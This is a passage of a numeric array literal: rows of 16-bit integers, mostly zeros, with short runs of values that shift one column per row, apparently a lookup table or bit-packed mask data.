[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 9092, 43585, 15846, 23302, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 21504, 62720, 34112, 1872, 25684, 35829, 43558],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 35460, 49473, 43750, 55302, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 38912, 26112, 35200, 46688, 20632, 31846, 5409],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 61828, 55361, 6118, 21766, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 60160, 29376, 63152, 52012, 37867, 45176],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 22660, 61249, 34022, 53766, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 5120, 25856, 61760, 9808, 19732, 37467],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 49028, 1601, 61926, 20230, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 17408, 45312, 21568, 17168, 12612, 31153, 30906],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 9860, 7489, 24294, 52230, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 18432, 53760, 17536, 3360, 15432, 25554, 21573],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 36228, 13377, 52198, 18694, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 39936, 50944, 35264, 17520, 27804, 49863, 28524],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 62596, 19265, 14566, 50694, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 2048, 16896, 41088, 5152, 24927],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 23428, 25153, 42470, 17158, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 13312, 44288, 29504, 37584, 9012, 10413, 48398],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 49796, 31041, 4838, 49158, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 63488, 32256, 36736, 2016, 28920, 62846, 11305],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 10628, 36929, 32742, 15622, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 3072, 58112, 28864, 1584, 19212, 63715, 26144],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 36996, 42817, 60646, 47622, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 27648, 47872, 5824, 23472, 50028, 13091],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 63364, 48705, 23014, 14086, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 9216, 59648, 57920, 46736, 43556, 29929, 27426],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 24196, 54593, 50918, 46086, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 43008, 27136, 27264, 26272, 7848, 15722, 41165],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 50564, 60481, 13286, 12550, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 31744, 16128, 10176, 64496, 22140, 12863, 59540],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 11396, 833, 41190, 44550, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 63488, 32256, 12160, 2016, 1784, 60327],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 37764, 6721, 3558, 11014, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 5120, 25856, 41280, 28240, 13844, 31333, 14070],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 64132, 12609, 31462, 43014, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 38400, 54656, 59744, 30040, 34710, 30257],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 24964, 18497, 59366, 9478, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 60416, 56064, 44736, 58800, 32492, 43739, 2760],
